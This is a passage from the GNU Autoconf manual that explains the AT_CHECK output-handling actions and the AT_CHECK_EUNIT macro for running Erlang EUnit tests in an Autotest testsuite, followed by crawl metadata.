AT_CHECK_UNQUOTEDis that only the latter performs shell variable expansion (‘$’), command substitution (‘`’), and backslash escaping (‘\’) on comparison text given in the stdout and stderr arguments; if the text includes a trailing newline, this would be the same as if it were specified via an unquoted here-document. (However, there is no difference in the interpretation of commands).
- ‘ignore’
- The content of the output is ignored, but still captured in the test group log (if the testsuite is run with option -v, the test group log is displayed as the test is run; if the test group later fails, the test group log is also copied into the overall testsuite log). This action is valid for both stdout and stderr.
- ‘ignore-nolog’
- The content of the output is ignored, and nothing is captured in the log files. If commands are likely to produce binary output (including long lines) or large amounts of output, then logging the output can make it harder to locate details related to subsequent tests within the group, and could potentially corrupt terminal display of a user running testsuite -v.
- ‘stdout’
- For the stdout parameter, capture the content of standard output to both the file stdout and the test group log. Subsequent commands in the test group can then post-process the file. This action is often used when it is desired to use grep to look for a substring in the output, or when the output must be post-processed to normalize error messages into a common form.
- ‘stderr’
- Like ‘stdout’, except that it only works for the stderr parameter, and the standard error capture file will be named stderr.
- ‘stdout-nolog’
- ‘stderr-nolog’
- Like ‘stdout’ or ‘stderr’, except that the captured output is not duplicated into the test group log. This action is particularly useful for an intermediate check that produces large amounts of data, which will be followed by another check that filters down to the relevant data, as it makes it easier to locate details in the log.
- ‘expout’
- For the stdout parameter, compare standard output contents with the previously created file expout, and list any differences in the testsuite log.
- ‘experr’
- Like ‘expout’, except that it only works for the stderr parameter, and the standard error contents are compared with experr.
Initialize and execute an Erlang module named module that performs tests following the test-spec EUnit test specification. test-spec must be a valid EUnit test specification, as defined in the EUnit Reference Manual. erlflags are optional command-line options passed to the Erlang interpreter to execute the test Erlang module. Typically, erlflags defines at least the paths to directories containing the compiled Erlang modules under test, as ‘-pa path1 path2 ...’.
For example, the unit tests associated with Erlang module ‘testme’, which compiled code is in subdirectory src, can be performed with:AT_CHECK_EUNIT([testme_testsuite], [{module, testme}], [-pa "${abs_top_builddir}/src"])
This macro must be invoked in between
AT_SETUPand
AT_CLEANUP.
Variables
ERL,
ERLC, and (optionally)
ERLCFLAGSmust be defined as the path of the Erlang interpreter, the path of the Erlang compiler, and the command-line flags to pass to the compiler, respectively. Those variables should be configured in configure.ac using the AC_ERLANG_PATH_ERL and AC_ERLANG_PATH_ERLC macros, and the configured values of those variables are automatically defined in the testsuite. If
ERLor
ERLCis not defined, the test group is skipped.
If the EUnit library cannot be found, i.e. if module
eunitcannot be loaded, the test group is skipped. Otherwise, if test-spec is an invalid EUnit test specification, the test group fails. Otherwise, if the EUnit test passes, shell commands run-if-pass are executed or, if the EUnit test fails, shell commands run-if-fail are executed and the test group fails.
Only the generated test Erlang module is automatically compiled and executed. If test-spec involves testing other Erlang modules, e.g. module ‘testme’ in the example above, those modules must be already compiled.
If the testsuite is run in verbose mode, with option --verbose, EUnit is also run in verbose mode to output more details about individual unit tests.
|
https://www.gnu.org/software/autoconf/manual/autoconf-2.67/html_node/Writing-Testsuites.html
|
CC-MAIN-2014-15
|
refinedweb
| 1,703
| 60.65
|
Hey, ive written a piece of code which reads from a file called test.txt. all it does is use strtok to seperate the data from the spaces because there are alot of them, and then print them out, this worked fine when i did a test for just 1 line, but when i put this code in a while(!ins.eof()) loop, it reports a seg fault.... here is my code.
#include <iostream> #include <fstream> using namespace std; int main() { ifstream ins; ins.open("test.txt", ios::in); char info[500]; if(ins.good()) { ins.getline(info, 500); // first line are just titles while(!ins.eof()) { int found = 0; ins.getline(info, 500); cout << info << endl; char *name = NULL; name = strtok(info, " "); // read in name char *dates = NULL; dates = strtok(0, " "); //read in dates char *dates2 = NULL; // if the first element of dates is 0, 1, 2, dont read in dates2 if(dates[0] == '0' || dates[0] == '1' || dates[0] == '2') { found = 0; }else{ // else read in 1 extra char (dates2) found = 1; dates2 = strtok(0, " "); } char *sold = NULL; sold = strtok(0, " "); char *minutes = NULL; minutes = strtok(0, " :"); char *seconds = NULL; seconds = strtok(0, " "); cout << "name: " << name << endl; if(found == 1) { cout << "TRUEdate: " << dates << " " << dates2 << endl; }else if(found == 0){ cout << "FALSEdate: " << dates <<endl; } cout << "sold: " << sold << endl; cout << "minutes: " << minutes << endl; cout << "seconds: " << seconds << endl; found = 0; } exit(1); } return 0; }
for some reason it doesnt like me having the this peice of code in there
if(dates[0] == '0' || dates[0] == '1' || dates[0] == '2') { found = 0; }else{ found = 1; dates2 = strtok(0, " "); }
but the point of this is to read in the day from the date section if the date isnt in the 24:60:60 time format....
test.txt contains
NAME DATE SOLD TIME Sign 23:44:10 ? 0:00 Maria Jul 11 ? 2:11 Umama Feb 11 ? 0:00 Xtr 11:23:30 ? 103:03 Fit Sep 17 ? 0:00 Ser Dec 21 22231 0:00 Rim 08:28:20 13322 0:00
|
https://www.daniweb.com/programming/software-development/threads/148566/seg-fault-problem
|
CC-MAIN-2017-17
|
refinedweb
| 339
| 85.73
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.